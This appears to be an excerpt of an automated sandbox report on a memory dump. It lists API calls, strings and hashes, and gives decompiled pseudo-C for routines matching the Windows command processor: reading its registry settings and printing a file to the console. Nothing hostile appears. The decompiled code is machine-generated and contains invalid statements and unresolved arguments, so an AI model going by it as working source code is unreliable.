Part of subcall function 003441DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 0034423D
Part of subcall function 003441DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 0034427D
Part of subcall function 003441DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 003442B7
Part of subcall function 003441DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00344307
Part of subcall function 003441DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00344341

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00343DC7
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00343E02
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 00343E9E
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00363840), ref: 00343EAF
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00343EC0
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00343EC7
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 00343EDC
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00343F07
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00343F18
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00343F2E
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00343F3F
??_V@YAXPAX@Z.MSVCRT ref: 00343F5F

Strings

\86, xrefs: 00343D3A
KERNEL32.DLL, xrefs: 00343F02
SetConsoleInputExeNameW, xrefs: 00343F34
CopyFileExW, xrefs: 00343F0D
IsDebuggerPresent, xrefs: 00343F1E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW$\86
API String ID: 570592814-3377345318
Opcode ID: 575c19c911af5d23ec807e9ef43db2036fcda4313ec03288e3d4875a288b53dd
Instruction ID: f28806906866007f38f95ab4b21a346fccea6952a939779d86aaaeb0d5c91119
Opcode Fuzzy Hash: 575c19c911af5d23ec807e9ef43db2036fcda4313ec03288e3d4875a288b53dd
Instruction Fuzzy Hash: DAA1E6316003019BDB27AB65EC4AAAA37FDEB84701F05411AF50ADF1A1DF74AE85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 003441DD, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311
registryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E003441DD(intOrPtr* __ecx) {
				signed int _v8;
				char _v4100;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr _v4120;
				intOrPtr _v4124;
				char _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				int _t88;
				long _t97;
				long _t114;
				long _t127;
				long _t130;
				wchar_t* _t131;
				wchar_t* _t135;
				wchar_t* _t139;
				void* _t144;
				long _t146;
				void* _t151;
				long _t152;
				void* _t153;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t163;
				signed int _t166;
				void* _t167;
				void* _t189;

				E00348290(0x101c);
				_t85 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t85 ^ _t166;
				_t162 = __ecx;
				_v4128 = 0x80000002;
				_v4124 = 0x80000001;
				_t163 = 2;
				 *0x373cc9 = 1;
				_t144 =  &_v4128 - __ecx;
				_v4120 = _t163;
				while(1) {
					_t88 = RegOpenKeyExW( *(_t144 + _t162), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
					if(_t88 != 0) {
						goto L33;
					}
					_v4108 = _v4108 & _t88;
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DisableUNCCheck", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t139 =  &_v4104;
								__imp___wtol(_t139);
								asm("sbb al, al");
								 *0x378528 =  ~(_t139 - 1) + 1;
							}
						} else {
							 *0x378528 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					_t97 = RegQueryValueExW(_v4116, L"EnableExtensions", 0,  &_v4108,  &_v4104,  &_v4112);
					if(_t97 == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t135 =  &_v4104;
								__imp___wtol(_t135);
								asm("sbb al, al");
								 *0x373cc9 =  ~(_t135 - 1) + 1;
							}
						} else {
							 *0x373cc9 = _v4104 != _t97;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DelayedExpansion", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t131 =  &_v4104;
								__imp___wtol(_t131);
								asm("sbb al, al");
								 *0x373cc8 =  ~(_t131 - 1) + 1;
							}
						} else {
							 *0x373cc8 = _v4104 != 0;
						}
					}
					_v4112 = 0x1000;
					if(RegQueryValueExW(_v4116, L"DefaultColor", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
						L11:
						_v4112 = 0x1000;
						if(RegQueryValueExW(_v4116, L"CompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
							L19:
							_v4112 = 0x1000;
							if(RegQueryValueExW(_v4116, L"PathCompletionChar", 0,  &_v4108,  &_v4104,  &_v4112) != 0) {
								_t114 =  *0x35d0d4; // 0x20
								0x800 = 0x20;
								L27:
								_t146 =  *0x35d0d8; // 0x20
								if(_t146 != 0x800) {
									L29:
									if(_t189 == 0 && _t146 < 0x800) {
										 *0x35d0d4 = _t146;
									}
									L31:
									_v4112 = 0x1000;
									if(RegQueryValueExW(_v4116, L"AutoRun", 0,  &_v4108,  &_v4104,  &_v4112) == 0) {
										if(_v4108 == 2) {
											_t159 = _v4112 >> 1;
											_t165 =  &_v4100 + _t159 * 2;
											if(ExpandEnvironmentStringsW( &_v4104,  &_v4100 + _t159 * 2, 0x7fe - _t159) == 0) {
												_v4104 = 0;
											} else {
												E00341040( &_v4104, 0x800, _t165);
											}
											_t163 = _v4120;
										}
										if(_v4104 != 0) {
											 *_t162 = E0033DF40( &_v4104);
										}
									}
									_t88 = RegCloseKey(_v4116);
									goto L33;
								}
								_t189 = _t114 - 0x800;
								if(_t189 < 0) {
									 *0x35d0d8 = _t114;
									goto L31;
								}
								goto L29;
							}
							if(_v4108 != 4) {
								if(_v4108 != 1) {
									_t114 =  *0x35d0d4; // 0x20
									goto L23;
								}
								_t114 = wcstol( &_v4104, 0, 0);
								_t167 = _t167 + 0xc;
								goto L22;
							} else {
								_t114 = _v4104;
								L22:
								 *0x35d0d4 = _t114;
								L23:
								if(_t114 == 0) {
									0x800 = 0x20;
									L26:
									_t114 = 0x800;
									 *0x35d0d4 = 0x800;
									goto L27;
								}
								_t151 = 0xd;
								0x800 = 0x20;
								if(_t114 == _t151 || _t114 > 0x800) {
									goto L26;
								} else {
									goto L27;
								}
							}
						}
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								_t127 =  *0x35d0d8; // 0x20
								goto L15;
							}
							_t127 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L14;
						} else {
							_t127 = _v4104;
							L14:
							 *0x35d0d8 = _t127;
							L15:
							if(_t127 == 0) {
								_t152 = 0x20;
								L18:
								 *0x35d0d8 = _t152;
								goto L19;
							}
							_t153 = 0xd;
							_t152 = 0x20;
							if(_t127 == _t153 || _t127 > _t152) {
								goto L18;
							} else {
								goto L19;
							}
						}
					} else {
						if(_v4108 != 4) {
							if(_v4108 != 1) {
								goto L11;
							}
							_t130 = wcstol( &_v4104, 0, 0);
							_t167 = _t167 + 0xc;
							goto L10;
						} else {
							_t130 = _v4104;
							L10:
							 *0x35d5a0 = _t130;
							goto L11;
						}
					}
					L33:
					_t162 = _t162 + 4;
					_t163 = _t163 - 1;
					_v4120 = _t163;
					if(_t163 == 0) {
						__imp__time();
						srand(_t88);
						return E00346FD0(_t88, _t144, _v8 ^ _t166, 0x800, _t162, _t163, 0);
					}
				}
			}

0x003441e7
0x003441ec
0x003441f3
0x003441fb
0x003441fd
0x0034420d
0x00344217
0x00344218
0x0034421f
0x00344221
0x00344227
0x0034423d
0x00344245
0x00000000
0x00000000
0x0034424b
0x0034425e
0x00344285
0x0034e517
0x0034e533
0x0034e539
0x0034e540
0x0034e54a
0x0034e54e
0x0034e54e
0x0034e519
0x0034e520
0x0034e520
0x0034e517
0x00344291
0x003442b7
0x003442bf
0x003442c8
0x0034e55f
0x0034e565
0x0034e56c
0x0034e576
0x0034e57a
0x0034e57a
0x003442ce
0x003442d4
0x003442d4
0x003442c8
0x003442e1
0x0034430f
0x0034e58b
0x0034e5a7
0x0034e5ad
0x0034e5b4
0x0034e5be
0x0034e5c2
0x0034e5c2
0x0034e58d
0x0034e594
0x0034e594
0x0034e58b
0x0034431b
0x00344349
0x00344365
0x0034436b
0x00344399
0x003443d5
0x003443db
0x00344409
0x0034e65c
0x0034e664
0x0034444a
0x0034444a
0x00344454
0x00344463
0x00344463
0x003444f0
0x003444f0
0x0034446e
0x00344474
0x003444a2
0x0034e67c
0x0034e68a
0x0034e69a
0x0034e6a7
0x0034e6be
0x0034e6a9
0x0034e6b5
0x0034e6b5
0x0034e6c5
0x0034e6c5
0x0034e6d3
0x0034e6e4
0x0034e6e4
0x0034e6d3
0x003444ae
0x00000000
0x003444ae
0x0034445a
0x0034445d
0x0034e66a
0x00000000
0x0034e66a
0x00000000
0x0034445d
0x00344416
0x0034e62e
0x0034e649
0x00000000
0x0034e649
0x0034e63b
0x0034e641
0x00000000
0x0034441c
0x0034441c
0x00344423
0x00344423
0x00344429
0x0034442c
0x0034e656
0x00344442
0x00344442
0x00344444
0x00000000
0x00344444
0x00344434
0x00344437
0x0034443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0034443b
0x00344416
0x003443a2
0x0034e5f9
0x0034e614
0x00000000
0x0034e614
0x0034e606
0x0034e60c
0x00000000
0x003443a8
0x003443a8
0x003443af
0x003443af
0x003443b5
0x003443b8
0x0034e621
0x003443ce
0x003443ce
0x00000000
0x003443ce
0x003443c0
0x003443c6
0x003443c7
0x00000000
0x00000000
0x00000000
0x00000000
0x003443c7
0x0034434b
0x00344352
0x0034e5d3
0x00000000
0x00000000
0x0034e5e4
0x0034e5ea
0x00000000
0x00344358
0x00344358
0x0034435f
0x0034435f
0x00000000
0x0034435f
0x00344352
0x003444b4
0x003444b4
0x003444b7
0x003444ba
0x003444c0
0x003444c8
0x003444cf
0x003444e7
0x003444e7
0x003444c0

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 0034423D
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 0034427D
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 003442B7
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00344307
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00344341
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 00344391
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00344401
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 0034449A
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 003444AE
time.MSVCRT ref: 003444C8
srand.MSVCRT ref: 003444CF

Strings

DelayedExpansion, xrefs: 003442FC
AutoRun, xrefs: 0034448F
CompletionChar, xrefs: 00344386
DisableUNCCheck, xrefs: 00344272
Software\Microsoft\Command Processor, xrefs: 00344235
PathCompletionChar, xrefs: 003443F6
EnableExtensions, xrefs: 003442AC
DefaultColor, xrefs: 00344336

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: ffd0c26c60a80c082eba35668ee1275f8f698e4b2a75be07e2a7cfa148450544
Instruction ID: 34290c58cfa64099e97cd94821bd2c542b85553ca87abd137783654fd48ac413
Opcode Fuzzy Hash: ffd0c26c60a80c082eba35668ee1275f8f698e4b2a75be07e2a7cfa148450544
Instruction Fuzzy Hash: 9BC172399002A9EAEF339B10DD44BD977BCFB18702F1041E6E689AA190D7B46EC4CF55

Uniqueness

Uniqueness Score: -1.00%

Function 003565A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E003565A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E00348290(0x1074);
				_t137 =  *0x35d0b4; // 0xd59bd0e8
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E00340C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E0033D120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E00340178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0x35d544;
							if( *0x35d544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0x373cf0 = _t157;
								E0033C5A2(_t222);
								L82:
								E0033DB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E0034269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0x377f30));
											if( *((char*)(_t161 + 0x377f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E00356CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0x363854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0x373cd0;
														if( *0x373cd0 != 0) {
															E0033C5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0x35d544;
																if( *0x35d544 != 0) {
																	goto L86;
																}
																_t175 = E0034269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0x37805c;
																	if( *0x37805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E003427C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0x373cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0x373cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E00340178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E00359953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E0035985A( *0x373cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E0033C5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E0033C5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0x37805c - _t160;
									if( *0x37805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E0033DB92(_t263);
						goto L87;
					}
					_t206 = E00343320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0x373cf0;
						__eflags =  *0x373cf0 - 0x7b;
						if( *0x373cf0 == 0x7b) {
							_t250 = 2;
							 *0x373cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E0033D120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E0035985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E00346FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}

0x003565a0
0x003565a5
0x003565ad
0x003565b2
0x003565b9
0x003565c0
0x003565ca
0x003565d3
0x003565e1
0x003565e5
0x003565e7
0x003565eb
0x003565ec
0x003565f1
0x003565f9
0x003565fd
0x00356601
0x00356605
0x0035660c
0x00356613
0x0035661e
0x0035663e
0x0035664e
0x00356657
0x00356659
0x0035665c
0x003566cd
0x003566d6
0x003566da
0x003566df
0x003566e1
0x003566e3
0x003566e9
0x003566f7
0x00356701
0x00356709
0x0035670f
0x0035670f
0x0035670f
0x00356713
0x00356713
0x00356717
0x00356717
0x00356717
0x0035671e
0x00000000
0x00000000
0x00356730
0x00356739
0x0035673f
0x00356741
0x00356747
0x00356749
0x00356aad
0x00356aad
0x00356ab3
0x00356ab5
0x00356ab6
0x00356abb
0x00356ac2
0x00356ac4
0x00356ac9
0x00000000
0x00356ac9
0x0035674f
0x00356753
0x00356755
0x00000000
0x00000000
0x0035675b
0x00356760
0x0035679c
0x0035679c
0x003567a0
0x003567a2
0x003567ba
0x003567bc
0x003567c1
0x003567c3
0x003567d5
0x003567d5
0x003567d9
0x003567e0
0x003567e2
0x00356800
0x00356800
0x00356804
0x00000000
0x00000000
0x003567e6
0x003567e9
0x003567f0
0x003567fc
0x003567fc
0x003567fd
0x003567fd
0x00000000
0x003567fd
0x003567f2
0x003567f3
0x003567f3
0x003567f6
0x003567fa
0x0035680a
0x00356812
0x00356818
0x0035681a
0x00356820
0x00356822
0x00000000
0x00000000
0x0035682c
0x0035682c
0x0035682d
0x00356831
0x00356835
0x00356835
0x00356846
0x0035684d
0x00356852
0x00356854
0x00356864
0x00356888
0x0035688a
0x0035688e
0x00356890
0x00356892
0x00356897
0x00356897
0x0035689b
0x003568a6
0x003568aa
0x003568aa
0x003568af
0x003568b1
0x003568b8
0x003568c4
0x003568c9
0x003568cd
0x003568d0
0x003568d0
0x003568d4
0x003568d4
0x003568d4
0x003568d4
0x003568dd
0x003568e1
0x003568e3
0x00356a5d
0x00356a5d
0x00356a63
0x00356a67
0x00356a69
0x00356a6c
0x00356a76
0x00356a7e
0x00356a84
0x00356a88
0x00356a8c
0x00356a8c
0x00356a90
0x00356a94
0x00000000
0x00356a96
0x00356a96
0x00356a9a
0x00000000
0x00000000
0x00356a9c
0x00356aa4
0x00356aa4
0x00000000
0x00356aa4
0x00356a9e
0x00356aa2
0x00000000
0x00000000
0x00000000
0x00356aa2
0x003568e9
0x003568e9
0x003568eb
0x003568ec
0x003568ee
0x003568f6
0x003568fa
0x003568fc
0x00000000
0x00000000
0x00356902
0x00356902
0x00356909
0x00000000
0x00000000
0x00356911
0x00356916
0x00356918
0x0035695d
0x00356964
0x003569a5
0x003569aa
0x003569c4
0x003569c8
0x003569cc
0x003569d5
0x003569dc
0x003569e1
0x003569e6
0x003569ea
0x003569ee
0x003569f8
0x003569f8
0x003569fc
0x00356a04
0x00356a06
0x00356a0a
0x00356a0a
0x00356a0c
0x00356a10
0x00356a10
0x00356a14
0x00356a14
0x00356a16
0x00356a1e
0x00356a1e
0x00356a24
0x00356a29
0x00356a2b
0x00356a2d
0x00356a2d
0x00356a37
0x00356a39
0x00356a3e
0x00356a40
0x00356acd
0x00356acf
0x00356ad4
0x00356ad6
0x00356aee
0x00356ad8
0x00356ad8
0x00356ada
0x00356adf
0x00356ae5
0x00000000
0x00356a46
0x00356a46
0x00356a48
0x00356a4a
0x00000000
0x00356a50
0x00356a40
0x00356a1a
0x00356a1c
0x00000000
0x00000000
0x00000000
0x00356a1c
0x003569ac
0x003569ac
0x003569b0
0x003569b8
0x003569be
0x00000000
0x003569be
0x00356966
0x0035696b
0x00000000
0x00000000
0x0035696d
0x00356971
0x0035697e
0x0035698c
0x0035698e
0x00356992
0x00356994
0x00356998
0x0035699b
0x0035699f
0x00000000
0x0035699f
0x00356932
0x00356938
0x0035693c
0x0035693e
0x00356942
0x00000000
0x00000000
0x00356944
0x00356948
0x0035694a
0x00000000
0x00000000
0x0035694c
0x0035694e
0x00356950
0x00356954
0x00000000
0x00356954
0x003568f0
0x00000000
0x00356a51
0x00356a51
0x00356a51
0x00356a59
0x00000000
0x00356a59
0x003568e3
0x00356856
0x0035685a
0x0035685c
0x00000000
0x00000000
0x00356862
0x00000000
0x00356862
0x00000000
0x003567fa
0x00000000
0x00356806
0x003567c5
0x003567cb
0x00000000
0x00000000
